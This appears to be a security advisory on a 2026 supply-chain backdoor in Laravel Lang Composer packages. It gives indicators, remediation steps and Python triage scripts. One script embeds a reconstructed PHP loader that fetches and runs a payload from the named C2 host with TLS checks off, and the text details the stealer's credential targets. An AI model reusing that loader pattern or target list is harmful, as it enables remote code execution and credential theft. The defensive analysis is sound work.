A compromise affecting the community-maintained Laravel Lang project has introduced remote code execution backdoors across multiple packages in the organization, including laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, spanning more than 700 historical versions.
The affected packages are not part of the official Laravel framework. They are third-party localization packages used by Laravel applications. However, applications that installed compromised versions may have executed the backdoor automatically when Composer’s autoloader ran.
Newly observed tag activity suggests the compromise was not isolated to a single package. Recently published tags appeared across multiple repositories in the same GitHub organization, including Laravel-Lang/lang, Laravel-Lang/http-statuses, Laravel-Lang/attributes, and Laravel-Lang/actions. The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart.
For example, Laravel-Lang/lang tags across the 12.x, 13.x, 14.x, and 15.x lines were published in tight sequence on May 22, while Laravel-Lang/http-statuses and Laravel-Lang/attributes also saw rapid tag creation across historical versions during the same window. Laravel-Lang/actions tags followed shortly after, continuing into May 23 UTC.
Aikido Security also surfaced the compromise publicly, helping alert the Laravel and PHP communities to suspicious activity across Laravel Lang packages. Socket’s analysis of composer/laravel-lang/lang@14.3.7 confirmed a malicious src/helpers.php file registered in composer.json under autoload.files. In Composer packages, files listed under autoload.files are loaded automatically when the Composer autoloader runs, which means the malicious code can execute during normal application runtime.
The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization’s release process, rather than a single malicious package version.
The observed activity includes rapid publication of historical tags across:

- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/attributes
- Laravel-Lang/actions

Many of these tags were created seconds apart, a pattern that is unusual for normal package maintenance and consistent with automated mass tagging or republishing. The affected repositories belong to the same Laravel Lang GitHub organization, which suggests the attacker may have had access to organization-level credentials, repository automation, or release infrastructure.
This is a developing story. We will publish more information as our investigation continues.
The malicious activity is rooted in a file named src/helpers.php. Because this file is registered in composer.json under autoload.files, the backdoor runs every time the application includes vendor/autoload.php, which in practice means every PHP request handled by the compromised application as well as any CLI process (queue workers, scheduled commands) that boots the framework.
The infection sequence operates as follows:

1. Domain reconstruction: src/helpers.php assembles the command-and-control domain (flipboxstudio[.]info) at runtime using character codes (array_map('chr', [...])) to evade static string analysis.
2. Payload fetch: it downloads a second-stage payload from https://flipboxstudio[.]info/payload. To guarantee a successful fetch even under interception or certificate issues, it explicitly disables TLS certificate verification and fakes a Mozilla User-Agent.
3. Staging: the downloaded payload is written under sys_get_temp_dir()/.laravel_locale/.
4. Execution: the staged file is launched via exec("php ...") on Unix environments, or by generating and running a .vbs script via cscript on Windows systems.

This is a highly sophisticated, cross-platform (Linux, macOS, Windows) information stealer written in PHP. It acts as the second-stage payload delivered by the poisoned laravel-lang/attributes package.
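The first-stage loader described in the sequence above hides its strings behind array_map('chr', [...]) and leans on a handful of tell-tale calls (TLS verification disabled, staging under the system temp directory, spawning php). The following triage helper is an added example, not code from the compromised packages or from Socket: it decodes every chr-array string in a PHP file back to plaintext and scores the file against those behaviours. SAMPLE_PHP is a constructed stand-in that only mimics the described behaviour; it is not the real src/helpers.php, and the indicator names and the "two or more hits" threshold are the author's own choices.

```python
import re
import sys

# Constructed sample that mimics the behaviour described for src/helpers.php:
# domain assembled from character codes, TLS verification disabled, a staging
# directory under the temp dir, and a php process spawned to run the payload.
# This is NOT the actual malicious file from the laravel-lang packages.
SAMPLE_PHP = r"""<?php
$h = implode('', array_map('chr', [102,108,105,112,98,111,120,115,116,117,100,105,111,46,105,110,102,111]));
$p = implode('', array_map('chr', [47,112,97,121,108,111,97,100]));
$c = curl_init('https://' . $h . $p);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0');
$d = sys_get_temp_dir() . '/.laravel_locale/';
@mkdir($d, 0700, true);
file_put_contents($d . 'l.php', curl_exec($c));
exec("php " . $d . "l.php > /dev/null 2>&1 &");
"""

# Matches array_map('chr', [102, 108, ...]) and captures the code list.
CHR_ARRAY = re.compile(r"array_map\(\s*['\"]chr['\"]\s*,\s*\[([\d\s,]*)\]\s*\)")

# Behavioural indicators taken from the infection sequence above. The names
# and the scoring threshold are assumptions made for this example.
INDICATORS = {
    "chr_array_string": CHR_ARRAY,
    "tls_verify_disabled": re.compile(r"CURLOPT_SSL_VERIFYPEER\s*,\s*(false|0)\b"),
    "temp_dir_staging": re.compile(r"sys_get_temp_dir\s*\("),
    "spawns_php": re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(\s*[\"']php\b"),
    "windows_cscript": re.compile(r"cscript", re.IGNORECASE),
}


def decode_chr_arrays(source: str) -> list[str]:
    """Recover every string that the PHP source builds with array_map('chr', [...])."""
    decoded = []
    for match in CHR_ARRAY.finditer(source):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def score_helper_file(source: str) -> dict:
    """Flag a PHP file as suspicious when two or more loader indicators are present."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    return {
        "indicators": hits,
        "decoded_strings": decode_chr_arrays(source),
        "suspicious": sum(hits.values()) >= 2,
    }


if __name__ == "__main__":
    # Usage: python triage_helpers.py vendor/laravel-lang/lang/src/helpers.php
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_PHP
    result = score_helper_file(text)
    for name, hit in result["indicators"].items():
        print(f"{name:22s} {'HIT' if hit else '-'}")
    for s in result["decoded_strings"]:
        print("decoded:", s)
    print("suspicious:", result["suspicious"])
```

Run it against every file that Composer lists under autoload.files (vendor/composer/autoload_files.php enumerates them), not only the laravel-lang packages: the decoder is generic and the decoded strings are what you want to pivot on in proxy and DNS logs.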
Rather than a simple backdoor, this script is a comprehensive credential-harvesting framework designed to systematically strip a compromised server or developer machine of virtually all sensitive data, encrypt it, and exfiltrate it to the C2 server.
Here is a technical breakdown of the malware’s capabilities and execution flow:
- Exfiltration and encoding: the stealer sends its haul to https://flipboxstudio[.]info/exfil and uses a hardcoded key (k9X2mP7vL4nQ8wR1) to XOR-encrypt the stolen data before exfiltration. XOR with a static key is obfuscation rather than encryption, so captured exfiltration traffic can be recovered once the key is known.
- Collector architecture: a Stealer class initializes 17 distinct "Collectors," each targeting a specific category of software, cloud infrastructure, or operating system secrets.
- Pattern matching: the malware uses a massive dictionary of regular expressions to scrape files, databases, and environment variables for API keys (AWS, GitHub, Stripe, Slack, Discord, JWTs, private keys, etc.).
Its specific collectors include:

- Cloud (AwsCollector, CloudCollector): queries cloud metadata endpoints (e.g., EC2 IMDS at 169.254.169.254) to steal IAM roles and instance identity documents. It also scrapes local configuration files for Azure, Google Cloud (gcloud), DigitalOcean, Heroku, Netlify, and Vercel.
- Kubernetes (K8sCollector): steals Kubernetes Service Account tokens from /var/run/secrets/..., local kubeconfig files, and Helm registry configurations.
- Vault (VaultCollector): attempts to find Vault tokens via environment variables, files, or Kubernetes auth, and if successful, recursively queries the Vault API to dump Key-Value secrets.
- CI/CD (CiCdCollector): targets build servers, extracting tokens and configurations from Jenkins (including the master.key and credentials.xml), GitLab Runners, GitHub Actions, CircleCI, TravisCI, and ArgoCD.
- Cryptocurrency (CryptoCollector): scans for wallet data files (Bitcoin, Ethereum, Monero, etc.) and browser extension local storage (MetaMask, Phantom, Trust Wallet). It also scans desktop/document folders for plaintext files named seed.txt or recovery.txt.
- Browsers (BrowserCollector & ChromiumDecryptor): extracts history, cookies, and login data from Chrome, Edge, Firefox, Brave, and Opera. On Windows it carries a helper binary (DebugChromium.exe); the PHP script drops and executes this binary specifically to bypass Chrome v127+ App-Bound Encryption and extract the master decryption key. Firefox is decrypted natively using NSS algorithms.
- Password managers (PasswordManagerCollector): targets local vaults and browser extension data for 1Password, Bitwarden, LastPass, KeePass, Dashlane, and NordPass.
- Processes and Windows credentials (ProcessCollector, WindowsCredentialCollector):
  - Linux: reads /proc/[pid]/environ and /proc/[pid]/cmdline to steal secrets passed via the environment or command-line arguments to running processes.
  - Windows: dumps Credential Manager entries (cmdkey), Vault credentials (vaultcmd), .rdp files, and PuTTY/WinSCP saved sessions (including native decryption of WinSCP passwords).
- Messaging, FTP, and email (MessagingCollector, FtpCollector, EmailCollector): extracts session tokens from Discord and Slack leveldb storage, and dumps profiles from Outlook, Thunderbird, and popular FTP clients (FileZilla, WinSCP, CoreFTP), often reversing weak proprietary encoding/XOR obfuscation.
- Files (FileCollector): scours Windows, macOS, and Linux paths for high-value configuration and credential files, including Docker auth tokens, SSH private keys, Git credentials, shell history files, database history files, Kubernetes cluster configurations, .env files, wp-config.php, and docker-compose.yml.
- Environment (EnvCollector): captures environment variables loaded into the PHP process and filters for sensitive keys containing terms like KEY, SECRET, API, TOKEN, PASSWORD, AWS_, AZURE_, GCP_, STRIPE_, and more, then applies regex patterns to extract recognizable credential formats.
- Git (GitCollector): extracts source control credentials from global and local .gitconfig files, .git-credentials, and .netrc files. It parses embedded HTTP basic auth credentials and SSH host configurations associated with GitHub, GitLab, and Bitbucket.
- VPN (VpnCollector): collects VPN configuration and saved login files for OpenVPN, WireGuard, NetworkManager, and commercial VPNs such as NordVPN, ExpressVPN, CyberGhost, and Mullvad. It parses .ovpn and .conf files to extract embedded usernames, passwords, or referenced auth-user-pass credential files.

We're tracking this supply chain attack on a dedicated campaign page: socket.dev/supply-chain-attacks/laravel-lang-compromise
Teams using affected Laravel Lang packages should treat impacted systems as potentially compromised, not just exposed. Check composer.lock for laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, and block these packages until clean versions are confirmed.
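Both the composer.lock check above and the autoload.files mechanism explained earlier can be inventoried from the lock file alone, because Composer copies each package's autoload block into composer.lock. The script below is an added example (not Socket's tooling and not part of any Laravel Lang package) that lists affected packages and every autoload.files hook they register. SAMPLE_LOCK is a constructed two-package excerpt, not a real lock file; the version 14.3.7 is the one Socket analysed above, and the "example/*" package names and the PSR-4 namespace are placeholders.

```python
import json
import sys
from typing import Iterator

# Packages named in the advisory above.
AFFECTED_PACKAGES = {
    "laravel-lang/lang",
    "laravel-lang/http-statuses",
    "laravel-lang/attributes",
    "laravel-lang/actions",
}

# Constructed composer.lock excerpt for the example. Composer writes each
# package's "autoload" block into the lock, so autoload.files is visible here
# without reading vendor/. Namespace and the example/* packages are invented.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {
            "name": "laravel-lang/lang",
            "version": "14.3.7",
            "autoload": {"psr-4": {"LaravelLang\\Lang\\": "src/"}, "files": ["src/helpers.php"]},
        },
        {
            "name": "example/polyfill",
            "version": "1.0.0",
            "autoload": {"files": ["bootstrap.php"]},
        },
    ],
    "packages-dev": [
        {"name": "example/testing", "version": "2.0.0", "autoload": {"psr-4": {"Example\\Testing\\": "src/"}}},
    ],
})


def locked_packages(lock_text: str) -> Iterator[dict]:
    """Yield every package entry from both the production and dev sections of a lock file."""
    lock = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        yield from lock.get(section, [])


def find_affected(lock_text: str) -> list[tuple[str, str]]:
    """(name, version) for every locked package in the advisory's affected set."""
    return sorted(
        (p["name"], p.get("version", "?"))
        for p in locked_packages(lock_text)
        if p.get("name") in AFFECTED_PACKAGES
    )


def autoload_files(lock_text: str) -> list[tuple[str, str]]:
    """(name, file) for every file that Composer will include unconditionally at autoload time."""
    return [
        (p["name"], f)
        for p in locked_packages(lock_text)
        for f in p.get("autoload", {}).get("files", [])
    ]


def suspicious_autoload_files(lock_text: str) -> list[tuple[str, str]]:
    """autoload.files entries registered by affected packages: the exact hook the backdoor uses."""
    return [(name, f) for name, f in autoload_files(lock_text) if name in AFFECTED_PACKAGES]


if __name__ == "__main__":
    # Usage: python check_lock.py composer.lock
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_LOCK
    for name, version in find_affected(text):
        print(f"AFFECTED {name} {version}")
    for name, path in suspicious_autoload_files(text):
        print(f"AUTOLOAD HOOK {name}: {path}")
    sys.exit(1 if find_affected(text) else 0)
```

The lock file only records what Composer resolved; a host installed without the lock, or with a stale vendor/ directory, can differ from it. Pair this check with `composer show` on the deployed host, and treat any laravel-lang autoload.files entry as confirmation that the hook was wired in, not merely that the package was present.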
Because the payload targets cloud metadata, Kubernetes tokens, Vault, CI/CD systems, browser data, password managers, source control credentials, VPN configs, SSH keys, .env files, and local application configs, affected teams should rotate any secrets available to hosts, containers, CI runners, or developer machines that installed or ran the compromised packages.
Prioritize rotation of cloud credentials, Kubernetes Service Account tokens, Vault tokens, CI/CD secrets, GitHub/GitLab/Bitbucket tokens, SSH keys, Docker registry tokens, Laravel APP_KEY, database credentials, API keys, webhook secrets, and credentials stored in environment variables.
Rebuild affected hosts, containers, and CI runners from known-good images where possible. Preserve logs and package artifacts before cleanup, including composer.lock, Composer cache contents, deployment logs, process execution logs, network/DNS logs, cloud audit logs, Kubernetes audit logs, and temp directory contents.
Indicators of compromise:

- Affected packages: laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, laravel-lang/actions
- C2 domain: flipboxstudio[.]info
- Payload URL: https://flipboxstudio[.]info/payload
- Exfiltration URL: https://flipboxstudio[.]info/exfil
- Malicious file: src/helpers.php
- Composer hook: autoload.files → src/helpers.php
- Staging directory: sys_get_temp_dir()/.laravel_locale/
- Metadata endpoint queried: 169.254.169.254
- Dropped binary: DebugChromium.exe
- Behavioral indicators: php execution, cscript execution, dropped .php or VBS files, reads from /var/run/secrets/, reads from /proc/[pid]/environ, and outbound requests to flipboxstudio[.]info
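The host-side indicators above (the .laravel_locale staging directory, dropped .php or .vbs files, and DebugChromium.exe) are the quickest things to hunt for on a box that ran a compromised version. The triage routine below is an added example, not Socket's or the project's code: it walks a temp directory for those artifacts and reports what it finds. The demo() fixture is constructed in a throwaway directory so the example runs offline without touching the real temp directory; the placeholder file contents are invented.

```python
import tempfile
from pathlib import Path

# Artifacts named in the indicator list above.
STAGING_DIRNAME = ".laravel_locale"
DROPPED_BINARY = "DebugChromium.exe"
DROPPED_SUFFIXES = {".php", ".vbs"}


def triage_temp_dir(temp_dir: Path) -> list[str]:
    """Report the first-stage staging directory and any dropped artifacts under a temp directory."""
    findings = []
    staging = temp_dir / STAGING_DIRNAME
    if staging.is_dir():
        findings.append(f"staging directory present: {staging}")
        for path in sorted(staging.rglob("*")):
            if not path.is_file():
                continue
            if path.suffix.lower() in DROPPED_SUFFIXES:
                findings.append(f"dropped script: {path}")
            if path.name == DROPPED_BINARY:
                findings.append(f"dropped decryptor: {path}")
    # A stray VBS launcher directly in the temp root is also worth surfacing on Windows hosts.
    for path in sorted(temp_dir.glob("*.vbs")) if temp_dir.is_dir() else []:
        findings.append(f"vbs launcher in temp root: {path}")
    return findings


def demo() -> tuple[list[str], list[str]]:
    """Constructed fixture: build a fake staging layout, triage it, and triage a clean directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        staging = root / STAGING_DIRNAME
        staging.mkdir()
        # Placeholder contents only; nothing here resembles the real payload.
        (staging / "l.php").write_text("<?php // constructed placeholder\n")
        (staging / DROPPED_BINARY).write_bytes(b"MZ")
        (root / "launch.vbs").write_text("' constructed placeholder\n")
        clean_dir = root / "unrelated"
        clean_dir.mkdir()
        return triage_temp_dir(root), triage_temp_dir(clean_dir)


if __name__ == "__main__":
    # Usage: python triage_host.py   (inspects this host's temp directory)
    for line in triage_temp_dir(Path(tempfile.gettempdir())) or ["no indicators found"]:
        print(line)
```

Run this as the same user the PHP process runs as, because sys_get_temp_dir() resolves per process (TMPDIR, then the system default), and remember that an absent directory is not a clean bill of health: the stealer runs once and the loader may clean up, so the credential rotation above still applies.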